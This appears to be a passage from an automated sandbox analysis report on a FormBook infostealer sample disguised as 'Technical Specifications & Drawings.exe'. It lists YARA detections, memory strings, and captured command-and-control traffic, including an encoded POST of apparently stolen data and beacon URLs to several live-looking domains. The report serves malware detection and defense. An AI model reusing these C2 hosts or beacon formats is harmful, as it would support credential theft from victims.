6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: unknownHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: unknownDNS traffic detected: queries for: www.kirchhoff-darryl.com
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
